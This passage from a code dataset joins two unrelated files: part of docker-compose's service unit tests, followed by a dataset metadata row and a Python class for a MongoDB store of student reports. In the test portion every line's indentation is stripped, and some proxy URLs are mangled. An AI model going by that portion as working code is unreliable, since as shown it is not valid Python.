service = Service('foo', client=self.mock_client, build={'context': '.'})
service.build()
assert self.mock_client.build.call_count == 1
assert not self.mock_client.build.call_args[1]['pull']
def test_build_with_platform(self):
self.mock_client.api_version = '1.35'
self.mock_client.build.return_value = [
b'{"stream": "Successfully built 12345"}',
]
service = Service('foo', client=self.mock_client, build={'context': '.'}, platform='linux')
service.build()
assert self.mock_client.build.call_count == 1
call_args = self.mock_client.build.call_args
assert call_args[1]['platform'] == 'linux'
def test_build_with_default_platform(self):
self.mock_client.api_version = '1.35'
self.mock_client.build.return_value = [
b'{"stream": "Successfully built 12345"}',
]
service = Service(
'foo', client=self.mock_client, build={'context': '.'},
default_platform='linux'
)
assert service.platform == 'linux'
service.build()
assert self.mock_client.build.call_count == 1
call_args = self.mock_client.build.call_args
assert call_args[1]['platform'] == 'linux'
def test_service_platform_precedence(self):
self.mock_client.api_version = '1.35'
service = Service(
'foo', client=self.mock_client, platform='linux/arm',
default_platform='osx'
)
assert service.platform == 'linux/arm'
def test_service_ignore_default_platform_with_unsupported_api(self):
self.mock_client.api_version = '1.32'
self.mock_client.build.return_value = [
b'{"stream": "Successfully built 12345"}',
]
service = Service(
'foo', client=self.mock_client, default_platform='windows', build={'context': '.'}
)
assert service.platform is None
service.build()
assert self.mock_client.build.call_count == 1
call_args = self.mock_client.build.call_args
assert call_args[1]['platform'] is None
def test_build_with_override_build_args(self):
self.mock_client.build.return_value = [
b'{"stream": "Successfully built 12345"}',
]
build_args = {
'arg1': 'arg1_new_value',
}
service = Service('foo', client=self.mock_client,
build={'context': '.', 'args': {'arg1': 'arg1', 'arg2': 'arg2'}})
service.build(build_args_override=build_args)
called_build_args = self.mock_client.build.call_args[1]['buildargs']
assert called_build_args['arg1'] == build_args['arg1']
assert called_build_args['arg2'] == 'arg2'
def test_build_with_isolation_from_service_config(self):
self.mock_client.build.return_value = [
b'{"stream": "Successfully built 12345"}',
]
service = Service('foo', client=self.mock_client, build={'context': '.'}, isolation='hyperv')
service.build()
assert self.mock_client.build.call_count == 1
called_build_args = self.mock_client.build.call_args[1]
assert called_build_args['isolation'] == 'hyperv'
def test_build_isolation_from_build_override_service_config(self):
self.mock_client.build.return_value = [
b'{"stream": "Successfully built 12345"}',
]
service = Service(
'foo', client=self.mock_client, build={'context': '.', 'isolation': 'default'},
isolation='hyperv'
)
service.build()
assert self.mock_client.build.call_count == 1
called_build_args = self.mock_client.build.call_args[1]
assert called_build_args['isolation'] == 'default'
def test_config_dict(self):
self.mock_client.inspect_image.return_value = {'Id': 'abcd'}
service = Service(
'foo',
image='example.com/foo',
client=self.mock_client,
network_mode=ServiceNetworkMode(Service('other')),
networks={'default': None},
links=[(Service('one'), 'one')],
volumes_from=[VolumeFromSpec(Service('two'), 'rw', 'service')])
config_dict = service.config_dict()
expected = {
'image_id': 'abcd',
'options': {'image': 'example.com/foo'},
'links': [('one', 'one')],
'net': 'other',
'networks': {'default': None},
'volumes_from': [('two', 'rw')],
}
assert config_dict == expected
def test_config_dict_with_network_mode_from_container(self):
self.mock_client.inspect_image.return_value = {'Id': 'abcd'}
container = Container(
self.mock_client,
{'Id': 'aaabbb', 'Name': '/foo_1'})
service = Service(
'foo',
image='example.com/foo',
client=self.mock_client,
network_mode=ContainerNetworkMode(container))
config_dict = service.config_dict()
expected = {
'image_id': 'abcd',
'options': {'image': 'example.com/foo'},
'links': [],
'networks': {},
'net': 'aaabbb',
'volumes_from': [],
}
assert config_dict == expected
def test_config_hash_matches_label(self):
self.mock_client.inspect_image.return_value = {'Id': 'abcd'}
service = Service(
'foo',
image='example.com/foo',
client=self.mock_client,
network_mode=NetworkMode('bridge'),
networks={'bridge': {}, 'net2': {}},
links=[(Service('one', client=self.mock_client), 'one')],
volumes_from=[VolumeFromSpec(Service('two', client=self.mock_client), 'rw', 'service')],
volumes=[VolumeSpec('/ext', '/int', 'ro')],
build={'context': 'some/random/path'},
)
config_hash = service.config_hash
for api_version in set(API_VERSIONS.values()):
self.mock_client.api_version = api_version
assert service._get_container_create_options({}, 1)['labels'][LABEL_CONFIG_HASH] == (
config_hash
)
def test_remove_image_none(self):
web = Service('web', image='example', client=self.mock_client)
assert not web.remove_image(ImageType.none)
assert not self.mock_client.remove_image.called
def test_remove_image_local_with_image_name_doesnt_remove(self):
web = Service('web', image='example', client=self.mock_client)
assert not web.remove_image(ImageType.local)
assert not self.mock_client.remove_image.called
def test_remove_image_local_without_image_name_does_remove(self):
web = Service('web', build='.', client=self.mock_client)
assert web.remove_image(ImageType.local)
self.mock_client.remove_image.assert_called_once_with(web.image_name)
def test_remove_image_all_does_remove(self):
web = Service('web', image='example', client=self.mock_client)
assert web.remove_image(ImageType.all)
self.mock_client.remove_image.assert_called_once_with(web.image_name)
def test_remove_image_with_error(self):
self.mock_client.remove_image.side_effect = error = APIError(
message="testing",
response={},
explanation="Boom")
web = Service('web', image='example', client=self.mock_client)
with mock.patch('compose.service.log', autospec=True) as mock_log:
assert not web.remove_image(ImageType.all)
mock_log.error.assert_called_once_with(
"Failed to remove image for service %s: %s", web.name, error)
def test_specifies_host_port_with_no_ports(self):
service = Service(
'foo',
image='foo')
assert not service.specifies_host_port()
def test_specifies_host_port_with_container_port(self):
service = Service(
'foo',
image='foo',
ports=["2000"])
assert not service.specifies_host_port()
def test_specifies_host_port_with_host_port(self):
service = Service(
'foo',
image='foo',
ports=["1000:2000"])
assert service.specifies_host_port()
def test_specifies_host_port_with_host_ip_no_port(self):
service = Service(
'foo',
image='foo',
ports=["127.0.0.1::2000"])
assert not service.specifies_host_port()
def test_specifies_host_port_with_host_ip_and_port(self):
service = Service(
'foo',
image='foo',
ports=["127.0.0.1:1000:2000"])
assert service.specifies_host_port()
def test_specifies_host_port_with_container_port_range(self):
service = Service(
'foo',
image='foo',
ports=["2000-3000"])
assert not service.specifies_host_port()
def test_specifies_host_port_with_host_port_range(self):
service = Service(
'foo',
image='foo',
ports=["1000-2000:2000-3000"])
assert service.specifies_host_port()
def test_specifies_host_port_with_host_ip_no_port_range(self):
service = Service(
'foo',
image='foo',
ports=["127.0.0.1::2000-3000"])
assert not service.specifies_host_port()
def test_specifies_host_port_with_host_ip_and_port_range(self):
service = Service(
'foo',
image='foo',
ports=["127.0.0.1:1000-2000:2000-3000"])
assert service.specifies_host_port()
def test_image_name_from_config(self):
image_name = 'example/web:latest'
service = Service('foo', image=image_name)
assert service.image_name == image_name
def test_image_name_default(self):
service = Service('foo', project='testing')
assert service.image_name == 'testing_foo'
@mock.patch('compose.service.log', autospec=True)
def test_only_log_warning_when_host_ports_clash(self, mock_log):
self.mock_client.inspect_image.return_value = {'Id': 'abcd'}
ParallelStreamWriter.instance = None
name = 'foo'
service = Service(
name,
client=self.mock_client,
ports=["8080:80"])
service.scale(0)
assert not mock_log.warn.called
service.scale(1)
assert not mock_log.warn.called
service.scale(2)
mock_log.warn.assert_called_once_with(
'The "{}" service specifies a port on the host. If multiple containers '
'for this service are created on a single host, the port will clash.'.format(name))
def test_parse_proxy_config(self):
default_proxy_config = {
'httpProxy': 'http://proxy.mycorp.com:3128',
'httpsProxy': 'https://user:[email protected]:3129',
'ftpProxy': 'http://ftpproxy.mycorp.com:21',
'noProxy': '*.intra.mycorp.com',
}
self.mock_client.base_url = 'http+docker://localunixsocket'
self.mock_client._general_configs = {
'proxies': {
'default': default_proxy_config,
}
}
service = Service('foo', client=self.mock_client)
assert service._parse_proxy_config() == {
'HTTP_PROXY': default_proxy_config['httpProxy'],
'http_proxy': default_proxy_config['httpProxy'],
'HTTPS_PROXY': default_proxy_config['httpsProxy'],
'https_proxy': default_proxy_config['httpsProxy'],
'FTP_PROXY': default_proxy_config['ftpProxy'],
'ftp_proxy': default_proxy_config['ftpProxy'],
'NO_PROXY': default_proxy_config['noProxy'],
'no_proxy': default_proxy_config['noProxy'],
}
def test_parse_proxy_config_per_host(self):
default_proxy_config = {
'httpProxy': 'http://proxy.mycorp.com:3128',
'httpsProxy': 'https://user:[email protected]:3129',
'ftpProxy': 'http://ftpproxy.mycorp.com:21',
'noProxy': '*.intra.mycorp.com',
}
host_specific_proxy_config = {
'httpProxy': 'http://proxy.example.com:3128',
'httpsProxy': 'https://user:[email protected]:3129',
'ftpProxy': 'http://ftpproxy.example.com:21',
'noProxy': '*.intra.example.com'
}
self.mock_client.base_url = 'http+docker://localunixsocket'
self.mock_client._general_configs = {
'proxies': {
'default': default_proxy_config,
'tcp://example.docker.com:2376': host_specific_proxy_config,
}
}
service = Service('foo', client=self.mock_client)
assert service._parse_proxy_config() == {
'HTTP_PROXY': default_proxy_config['httpProxy'],
'http_proxy': default_proxy_config['httpProxy'],
'HTTPS_PROXY': default_proxy_config['httpsProxy'],
'https_proxy': default_proxy_config['httpsProxy'],
'FTP_PROXY': default_proxy_config['ftpProxy'],
'ftp_proxy': default_proxy_config['ftpProxy'],
'NO_PROXY': default_proxy_config['noProxy'],
'no_proxy': default_proxy_config['noProxy'],
}
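        # Once the client reports a matching original base URL, the host-specific
        # proxy entry takes precedence over the default one.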
self.mock_client._original_base_url = 'tcp://example.docker.com:2376'
assert service._parse_proxy_config() == {
'HTTP_PROXY': host_specific_proxy_config['httpProxy'],
'http_proxy': host_specific_proxy_config['httpProxy'],
'HTTPS_PROXY': host_specific_proxy_config['httpsProxy'],
'https_proxy': host_specific_proxy_config['httpsProxy'],
'FTP_PROXY': host_specific_proxy_config['ftpProxy'],
'ftp_proxy': host_specific_proxy_config['ftpProxy'],
'NO_PROXY': host_specific_proxy_config['noProxy'],
'no_proxy': host_specific_proxy_config['noProxy'],
}
def test_build_service_with_proxy_config(self):
default_proxy_config = {
'httpProxy': 'http://proxy.mycorp.com:3128',
'httpsProxy': 'https://user:[email protected]:3129',
}
buildargs = {
'HTTPS_PROXY': 'https://rdcf.th08.jp:8911',
'https_proxy': 'https://rdcf.th08.jp:8911',
}
self.mock_client._general_configs = {
'proxies': {
'default': default_proxy_config,
}
}
self.mock_client.base_url = 'http+docker://localunixsocket'
self.mock_client.build.return_value = [
b'{"stream": "Successfully built 12345"}',
]
service = Service('foo', client=self.mock_client, build={'context': '.', 'args': buildargs})
service.build()
assert self.mock_client.build.call_count == 1
assert self.mock_client.build.call_args[1]['buildargs'] == {
'HTTP_PROXY': default_proxy_config['httpProxy'],
'http_proxy': default_proxy_config['httpProxy'],
'HTTPS_PROXY': buildargs['HTTPS_PROXY'],
'https_proxy': buildargs['HTTPS_PROXY'],
}
def test_get_create_options_with_proxy_config(self):
default_proxy_config = {
'httpProxy': 'http://proxy.mycorp.com:3128',
'httpsProxy': 'https://user:[email protected]:3129',
'ftpProxy': 'http://ftpproxy.mycorp.com:21',
}
self.mock_client._general_configs = {
'proxies': {
'default': default_proxy_config,
}
}
self.mock_client.base_url = 'http+docker://localunixsocket'
override_options = {
'environment': {
'FTP_PROXY': 'ftp://xdge.exo.au:21',
'ftp_proxy': 'ftp://xdge.exo.au:21',
}
}
environment = {
'HTTPS_PROXY': 'https://rdcf.th08.jp:8911',
'https_proxy': 'https://rdcf.th08.jp:8911',
}
service = Service('foo', client=self.mock_client, environment=environment)
create_opts = service._get_container_create_options(override_options, 1)
assert set(create_opts['environment']) == set(format_environment({
'HTTP_PROXY': default_proxy_config['httpProxy'],
'http_proxy': default_proxy_config['httpProxy'],
'HTTPS_PROXY': environment['HTTPS_PROXY'],
'https_proxy': environment['HTTPS_PROXY'],
'FTP_PROXY': override_options['environment']['FTP_PROXY'],
'ftp_proxy': override_options['environment']['FTP_PROXY'],
}))
def test_create_when_removed_containers_are_listed(self):
# This is aimed at simulating a race between the API call to list the
# containers, and the ones to inspect each of the listed containers.
# It can happen that a container has been removed after we listed it.
# containers() returns a container that is about to be removed
self.mock_client.containers.return_value = [
{'Id': 'rm_cont_id', 'Name': 'rm_cont', 'Image': 'img_id'},
]
# inspect_container() will raise a NotFound when trying to inspect
# rm_cont_id, which at this point has been removed
def inspect(name):
if name == 'rm_cont_id':
raise NotFound(message='Not Found')
if name == 'new_cont_id':
return {'Id': 'new_cont_id'}
raise NotImplementedError("incomplete mock")
self.mock_client.inspect_container.side_effect = inspect
self.mock_client.inspect_image.return_value = {'Id': 'imageid'}
self.mock_client.create_container.return_value = {'Id': 'new_cont_id'}
# We should nonetheless be able to create a new container
service = Service('foo', client=self.mock_client)
assert service.create_container().id == 'new_cont_id'
def test_build_volume_options_duplicate_binds(self):
self.mock_client.api_version = '1.29' # Trigger 3.2 format workaround
service = Service('foo', client=self.mock_client)
ctnr_opts, override_opts = service._build_container_volume_options(
previous_container=None,
container_options={
'volumes': [
MountSpec.parse({'source': 'vol', 'target': '/data', 'type': 'volume'}),
VolumeSpec.parse('vol:/data:rw'),
],
'environment': {},
},
override_options={},
)
assert 'binds' in override_opts
assert len(override_opts['binds']) == 1
assert override_opts['binds'][0] == 'vol:/data:rw'
class TestServiceNetwork(unittest.TestCase):
def setUp(self):
self.mock_client = mock.create_autospec(docker.APIClient)
self.mock_client.api_version = DEFAULT_DOCKER_API_VERSION
self.mock_client._general_configs = {}
def test_connect_container_to_networks_short_aliase_exists(self):
service = Service(
'db',
self.mock_client,
'myproject',
image='foo',
networks={'project_default': {}})
container = Container(
None,
{
'Id': 'abcdef',
'NetworkSettings': {
'Networks': {
'project_default': {
'Aliases': ['analias', 'abcdef'],
},
},
},
},
True)
service.connect_container_to_networks(container)
assert not self.mock_client.disconnect_container_from_network.call_count
assert not self.mock_client.connect_container_to_network.call_count
def sort_by_name(dictionary_list):
return sorted(dictionary_list, key=lambda k: k['name'])
class BuildUlimitsTestCase(unittest.TestCase):
def test_build_ulimits_with_dict(self):
ulimits = build_ulimits(
{
'nofile': {'soft': 10000, 'hard': 20000},
'nproc': {'soft': 65535, 'hard': 65535}
}
)
expected = [
{'name': 'nofile', 'soft': 10000, 'hard': 20000},
{'name': 'nproc', 'soft': 65535, 'hard': 65535}
]
assert sort_by_name(ulimits) == sort_by_name(expected)
def test_build_ulimits_with_ints(self):
ulimits = build_ulimits({'nofile': 20000, 'nproc': 65535})
expected = [
{'name': 'nofile', 'soft': 20000, 'hard': 20000},
{'name': 'nproc', 'soft': 65535, 'hard': 65535}
]
assert sort_by_name(ulimits) == sort_by_name(expected)
def test_build_ulimits_with_integers_and_dicts(self):
ulimits = build_ulimits(
{
'nproc': 65535,
'nofile': {'soft': 10000, 'hard': 20000}
}
)
expected = [
{'name': 'nofile', 'soft': 10000, 'hard': 20000},
{'name': 'nproc', 'soft': 65535, 'hard': 65535}
]
assert sort_by_name(ulimits) == sort_by_name(expected)
class NetTestCase(unittest.TestCase):
def setUp(self):
self.mock_client = mock.create_autospec(docker.APIClient)
self.mock_client.api_version = DEFAULT_DOCKER_API_VERSION
self.mock_client._general_configs = {}
def test_network_mode(self):
network_mode = NetworkMode('host')
assert network_mode.id == 'host'
assert network_mode.mode == 'host'
assert network_mode.service_name is None
def test_network_mode_container(self):
container_id = 'abcd'
network_mode = ContainerNetworkMode(Container(None, {'Id': container_id}))
assert network_mode.id == container_id
assert network_mode.mode == 'container:' + container_id
assert network_mode.service_name is None
def test_network_mode_service(self):
container_id = 'bbbb'
service_name = 'web'
self.mock_client.containers.return_value = [
{'Id': container_id, 'Name': container_id, 'Image': 'abcd'},
]
service = Service(name=service_name, client=self.mock_client)
network_mode = ServiceNetworkMode(service)
assert network_mode.id == service_name
assert network_mode.mode == 'container:' + container_id
assert network_mode.service_name == service_name
def test_network_mode_service_no_containers(self):
service_name = 'web'
self.mock_client.containers.return_value = []
service = Service(name=service_name, client=self.mock_client)
network_mode = ServiceNetworkMode(service)
assert network_mode.id == service_name
assert network_mode.mode is None
assert network_mode.service_name == service_name
class ServicePortsTest(unittest.TestCase):
def test_formatted_ports(self):
ports = [
'3000',
'0.0.0.0:4025-4030:23000-23005',
ServicePort(6000, None, None, None, None),
ServicePort(8080, 8080, None, None, None),
ServicePort('20000', '20000', 'udp', 'ingress', None),
ServicePort(30000, '30000', 'tcp', None, '127.0.0.1'),
]
formatted = formatted_ports(ports)
assert ports[0] in formatted
assert ports[1] in formatted
assert '6000/tcp' in formatted
assert '8080:8080/tcp' in formatted
assert '20000:20000/udp' in formatted
assert '127.0.0.1:30000:30000/tcp' in formatted
def build_mount(destination, source, mode='rw'):
return {'Source': source, 'Destination': destination, 'Mode': mode}
class ServiceVolumesTest(unittest.TestCase):
def setUp(self):
self.mock_client = mock.create_autospec(docker.APIClient)
self.mock_client.api_version = DEFAULT_DOCKER_API_VERSION
self.mock_client._general_configs = {}
def test_build_volume_binding(self):
binding = build_volume_binding(VolumeSpec.parse('/outside:/inside', True))
assert binding == ('/inside', '/outside:/inside:rw')
def test_get_container_data_volumes(self):
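        # Only anonymous volumes that already existed on the previous container, plus
        # volumes declared by the image, should be carried over; host binds, named
        # volumes, tmpfs paths and brand-new paths should not.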
options = [VolumeSpec.parse(v) for v in [
'/host/volume:/host/volume:ro',
'/new/volume',
'/existing/volume',
'named:/named/vol',
'/dev/tmpfs'
]]
self.mock_client.inspect_image.return_value = {
'ContainerConfig': {
'Volumes': {
'/mnt/image/data': {},
}
}
}
container = Container(self.mock_client, {
'Image': 'ababab',
'Mounts': [
{
'Source': '/host/volume',
'Destination': '/host/volume',
'Mode': '',
'RW': True,
'Name': 'hostvolume',
}, {
'Source': '/var/lib/docker/aaaaaaaa',
'Destination': '/existing/volume',
'Mode': '',
'RW': True,
'Name': 'existingvolume',
}, {
'Source': '/var/lib/docker/bbbbbbbb',
'Destination': '/removed/volume',
'Mode': '',
'RW': True,
'Name': 'removedvolume',
}, {
'Source': '/var/lib/docker/cccccccc',
'Destination': '/mnt/image/data',
'Mode': '',
'RW': True,
'Name': 'imagedata',
},
]
}, has_been_inspected=True)
expected = [
VolumeSpec.parse('existingvolume:/existing/volume:rw'),
VolumeSpec.parse('imagedata:/mnt/image/data:rw'),
]
volumes, _ = get_container_data_volumes(container, options, ['/dev/tmpfs'], [])
assert sorted(volumes) == sorted(expected)
def test_merge_volume_bindings(self):
options = [
VolumeSpec.parse(v, True) for v in [
'/host/volume:/host/volume:ro',
'/host/rw/volume:/host/rw/volume',
'/new/volume',
'/existing/volume',
'/dev/tmpfs'
]
]
self.mock_client.inspect_image.return_value = {
'ContainerConfig': {'Volumes': {}}
}
previous_container = Container(self.mock_client, {
'Id': 'cdefab',
'Image': 'ababab',
'Mounts': [{
'Source': '/var/lib/docker/aaaaaaaa',
'Destination': '/existing/volume',
'Mode': '',
'RW': True,
'Name': 'existingvolume',
}],
}, has_been_inspected=True)
expected = [
'/host/volume:/host/volume:ro',
'/host/rw/volume:/host/rw/volume:rw',
'existingvolume:/existing/volume:rw',
]
binds, affinity = merge_volume_bindings(options, ['/dev/tmpfs'], previous_container, [])
assert sorted(binds) == sorted(expected)
assert affinity == {'affinity:container': '=cdefab'}
def test_mount_same_host_path_to_two_volumes(self):
service = Service(
'web',
image='busybox',
volumes=[
VolumeSpec.parse('/host/path:/data1', True),
VolumeSpec.parse('/host/path:/data2', True),
],
client=self.mock_client,
)
self.mock_client.inspect_image.return_value = {
'Id': 'ababab',
'ContainerConfig': {
'Volumes': {}
}
}
service._get_container_create_options(
override_options={},
number=1,
)
assert set(self.mock_client.create_host_config.call_args[1]['binds']) == set([
'/host/path:/data1:rw',
'/host/path:/data2:rw',
])
def test_get_container_create_options_with_different_host_path_in_container_json(self):
service = Service(
'web',
image='busybox',
volumes=[VolumeSpec.parse('/host/path:/data')],
client=self.mock_client,
)
volume_name = 'abcdefff1234'
self.mock_client.inspect_image.return_value = {
'Id': 'ababab',
'ContainerConfig': {
'Volumes': {
'/data': {},
}
}
}
self.mock_client.inspect_container.return_value = {
'Id': '123123123',
'Image': 'ababab',
'Mounts': [
{
'Destination': '/data',
'Source': '/mnt/sda1/host/path',
'Mode': '',
'RW': True,
'Driver': 'local',
'Name': volume_name,
},
]
}
service._get_container_create_options(
override_options={},
number=1,
previous_container=Container(self.mock_client, {'Id': '123123123'}),
)
assert (
self.mock_client.create_host_config.call_args[1]['binds'] ==
['{}:/data:rw'.format(volume_name)]
)
def test_warn_on_masked_volume_no_warning_when_no_container_volumes(self):
volumes_option = [VolumeSpec('/home/user', '/path', 'rw')]
container_volumes = []
service = 'service_name'
with mock.patch('compose.service.log', autospec=True) as mock_log:
warn_on_masked_volume(volumes_option, container_volumes, service)
assert not mock_log.warn.called
def test_warn_on_masked_volume_when_masked(self):
volumes_option = [VolumeSpec('/home/user', '/path', 'rw')]
container_volumes = [
VolumeSpec('/var/lib/docker/path', '/path', 'rw'),
VolumeSpec('/var/lib/docker/path', '/other', 'rw'),
]
service = 'service_name'
with mock.patch('compose.service.log', autospec=True) as mock_log:
warn_on_masked_volume(volumes_option, container_volumes, service)
mock_log.warn.assert_called_once_with(mock.ANY)
def test_warn_on_masked_no_warning_with_same_path(self):
volumes_option = [VolumeSpec('/home/user', '/path', 'rw')]
container_volumes = [VolumeSpec('/home/user', '/path', 'rw')]
service = 'service_name'
with mock.patch('compose.service.log', autospec=True) as mock_log:
warn_on_masked_volume(volumes_option, container_volumes, service)
assert not mock_log.warn.called
def test_warn_on_masked_no_warning_with_container_only_option(self):
volumes_option = [VolumeSpec(None, '/path', 'rw')]
container_volumes = [
VolumeSpec('/var/lib/docker/volume/path', '/path', 'rw')
]
service = 'service_name'
with mock.patch('compose.service.log', autospec=True) as mock_log:
warn_on_masked_volume(volumes_option, container_volumes, service)
assert not mock_log.warn.called
def test_create_with_special_volume_mode(self):
self.mock_client.inspect_image.return_value = {'Id': 'imageid'}
self.mock_client.create_container.return_value = {'Id': 'containerid'}
volume = '/tmp:/foo:z'
Service(
'web',
client=self.mock_client,
image='busybox',
volumes=[VolumeSpec.parse(volume, True)],
).create_container()
assert self.mock_client.create_container.call_count == 1
assert self.mock_client.create_host_config.call_args[1]['binds'] == [volume]
class ServiceSecretTest(unittest.TestCase):
def setUp(self):
self.mock_client = mock.create_autospec(docker.APIClient)
self.mock_client.api_version = DEFAULT_DOCKER_API_VERSION
self.mock_client._general_configs = {}
def test_get_secret_volumes(self):
secret1 = {
'secret': ServiceSecret.parse({'source': 'secret1', 'target': 'b.txt'}),
'file': 'a.txt'
}
service = Service(
'web',
client=self.mock_client,
image='busybox',
secrets=[secret1]
)
volumes = service.get_secret_volumes()
assert volumes[0].source == secret1['file']
assert volumes[0].target == '{}/{}'.format(SECRETS_PATH, secret1['secret'].target)
def test_get_secret_volumes_abspath(self):
secret1 = {
'secret': ServiceSecret.parse({'source': 'secret1', 'target': '/d.txt'}),
'file': 'c.txt'
}
service = Service(
'web',
client=self.mock_client,
image='busybox',
secrets=[secret1]
)
volumes = service.get_secret_volumes()
assert volumes[0].source == secret1['file']
assert volumes[0].target == secret1['secret'].target
def test_get_secret_volumes_no_target(self):
secret1 = {
'secret': ServiceSecret.parse({'source': 'secret1'}),
'file': 'c.txt'
}
service = Service(
'web',
client=self.mock_client,
image='busybox',
secrets=[secret1]
)
volumes = service.get_secret_volumes()
assert volumes[0].source == secret1['file']
assert volumes[0].target == '{}/{}'.format(SECRETS_PATH, secret1['secret'].source)
| 37.531378 | 101 | 0.599226 | [
"Apache-2.0"
] | BEllis/compose | tests/unit/service_test.py | 55,021 | Python |
import subprocess
import pymongo
class ReportsDataBase:
def __init__(self, url, db_name):
self.db_name = db_name
self.db = pymongo.MongoClient(url)[self.db_name]
self.db['reports'].create_index('group')
self.db['reports'].create_index('author')
self.db['reports'].create_index('title')
self.db['reports'].create_index([
('group', pymongo.ASCENDING),
('author', pymongo.ASCENDING)
])
self.db['reports'].create_index([
('group', pymongo.ASCENDING),
('faculty', pymongo.ASCENDING),
('department', pymongo.ASCENDING)
])
def export_reports_collection(self, file_name):
result = subprocess.run(['mongoexport',
f'--host=mongodb',
'--pretty',
'--jsonArray',
f'--db={self.db_name}',
'--collection=reports',
f'--out={file_name}.json'])
if result.returncode == 0:
return f'{file_name}.json'
else:
raise ChildProcessError(f'mongoexport error return code [{result.returncode}]')
def import_reports_collection(self, file_name):
result = subprocess.run(['mongoimport',
f'--host=mongodb',
'--jsonArray',
'--mode=merge',
f'--db={self.db_name}',
'--collection=reports',
f'--file={file_name}.json'])
if result.returncode != 0:
raise ChildProcessError(f'mongoimport error return code [{result.returncode}]')
def _drop_reports(self):
self.db['reports'].drop()
def save_report(self, report):
insert_result = self.db['reports'].insert_one(report.serialize_db())
inserted_id = insert_result.inserted_id
return inserted_id
def save_reports(self, reports):
        reports_to_insert = [report.serialize_db() for report in reports]
        insert_result = self.db['reports'].insert_many(reports_to_insert)
        inserted_ids = insert_result.inserted_ids
        return inserted_ids
def update_report(self, report_id, update_dict):
self.db['reports'].update_one({'_id': report_id}, {'$set': update_dict})
def get_all_faculties(self):
return sorted(self.db['reports'].distinct('faculty'))
def get_all_courses(self):
return sorted(self.db['reports'].distinct('course'))
def get_all_departments(self):
return sorted(self.db['reports'].distinct('department'))
def get_report_by_id(self, report_id):
return self.db['reports'].find_one({'_id': report_id})
def get_report_stat_by_id(self, report_id):
return self.db['reports'].find_one({'_id': report_id},
{'text': 0, 'words.unique_words': 0})
def get_report_top_words_by_id(self, report_id, num_words):
report = self.db['reports'].find_one({'_id': report_id},
{'words.most_popular_words': 1})
if len(report['words']['most_popular_words']) < num_words:
return report['words']['most_popular_words']
else:
            return report['words']['most_popular_words'][:num_words]
def get_reports_by_author(self, author, group):
for report in self.db['reports'].find({'author': author, 'group': group}).sort('title'):
yield report
def get_reports_by_group(self, group):
for report in self.db['reports'].find({'group': group}).sort('author'):
yield report
def get_reports_by_faculty(self, faculty):
for report in self.db['reports'].find({'faculty': faculty}):
yield report
def get_reports_by_course(self, course):
for report in self.db['reports'].find({'course': course}):
yield report
def get_reports_by_department(self, department):
for report in self.db['reports'].find({'department': department}):
yield report
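    # Per-author statistics averaged over all of the author's reports; the $reduce stage
    # unions the per-report unique-word sets so total_unique_words counts each word once.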
def get_stat_of_author(self, author):
cur = self.db['reports'].aggregate([
{'$match': {'author': author}},
{'$group': {
'_id': None,
'avg_total_words': {'$avg': '$words.total_words'},
'avg_unique_words': {'$avg': '$words.total_unique_words'},
'avg_persent_unique_words': {'$avg': '$words.persent_unique_words'},
'unique_words': {'$addToSet': '$words.unique_words'},
'avg_total_raw_symbols': {'$avg': '$symbols.total_raw_symbols'},
'avg_total_clean_symbols': {'$avg': '$symbols.total_clean_symbols'},
'total_reports_loaded': {'$sum': 1},
}
},
{'$addFields': {
'unique_words': {
'$reduce': {
'input': '$unique_words',
'initialValue': [],
'in': {'$setUnion': ['$$value', '$$this']}
}
}
}
},
{'$addFields': {'total_unique_words': {'$size': '$unique_words'}}}
])
return cur.next()
def get_stat_of_group(self, group):
return self.db['reports'].aggregate([
{'$match': {'group': group}},
{'$group': {
'_id': '$author',
'avg_total_words': {'$avg': '$words.total_words'},
'avg_unique_words': {'$avg': '$words.total_unique_words'},
'avg_persent_unique_words': {'$avg': '$words.persent_unique_words'},
'unique_words': {'$addToSet': '$words.unique_words'},
'avg_total_raw_symbols': {'$avg': '$symbols.total_raw_symbols'},
'avg_total_clean_symbols': {'$avg': '$symbols.total_clean_symbols'},
'total_reports_loaded': {'$sum': 1}
}
},
{'$addFields': {
'unique_words': {
'$reduce': {
'input': '$unique_words',
'initialValue': [],
'in': {'$setUnion': ['$$value', '$$this']}
}
}
}
},
{'$addFields': {'total_unique_words': {'$size': '$unique_words'}}},
{'$sort': {'_id': 1, 'total_unique_words': -1}}
])
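    # Per-group averages, optionally filtered by any combination of course, faculty and
    # department; the $match stage is only added when at least one filter is supplied.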
def get_stat_by_groups(self, course=None, faculty=None, department=None):
group = {
'$group': {
'_id': '$group',
'avg_total_words': {'$avg': '$words.total_words'},
'avg_unique_words': {'$avg': '$words.total_unique_words'},
'avg_persent_unique_words': {'$avg': '$words.persent_unique_words'},
'total_reports_loaded': {'$sum': 1}
}}
sort = {'$sort': {'_id': 1}}
if not course and not faculty and not department:
return self.db['reports'].aggregate([
group,
sort
])
if course and not faculty and not department:
match = {'$match': {'course': course}}
elif faculty and not course and not department:
match = {'$match': {'faculty': faculty}}
sort['$sort']['faculty'] = 1
elif department and not course and not faculty:
match = {'$match': {'department': department}}
sort['$sort']['department'] = 1
elif course and faculty or course and department or faculty and department:
match_list = []
if course:
match_list.append({'course': course})
if faculty:
match_list.append({'faculty': faculty})
sort['$sort']['faculty'] = 1
if department:
match_list.append({'department': department})
sort['$sort']['department'] = 1
match = {'$match': {'$and': match_list}}
return self.db['reports'].aggregate([
match,
group,
sort
])
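    # Pairwise vocabulary comparison for the given authors of one group: for each pair,
    # the share of common unique words relative to the smaller vocabulary (in percent),
    # plus the actual word intersections themselves.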
def get_words_compare(self, authors, group):
match_list = []
for author in authors:
match_list.append({'author': author})
match = {
'$match': {
'$and': [
{'group': group},
{'$or': match_list}
]
}
}
query = self.db['reports'].aggregate([
match,
{'$group': {
'_id': '$author',
'unique_words': {'$addToSet': '$words.unique_words'}
}},
{'$addFields': {
'unique_words': {
'$reduce': {
'input': '$unique_words',
'initialValue': [],
'in': {'$setUnion': ['$$value', '$$this']}
}
}
}
},
{'$sort': {'_id': 1}}
])
authors = list(query)
compare = {}
words_intersections = []
for author in authors:
compare[author['_id']] = dict()
for other_author in authors:
if other_author['_id'] == author['_id']:
compare[author['_id']][author['_id']] = float('nan')
else:
author_unique_words = set(author['unique_words'])
other_author_unique_words = set(other_author['unique_words'])
author_num_unique_words = len(author_unique_words)
other_author_num_unique_words = len(other_author_unique_words)
words_intersection = author_unique_words.intersection(other_author_unique_words)
compare[author['_id']][other_author['_id']] = len(words_intersection) \
/ min(author_num_unique_words, other_author_num_unique_words) * 100.0
words_intersections.append((
author['_id'],
other_author['_id'],
words_intersection
))
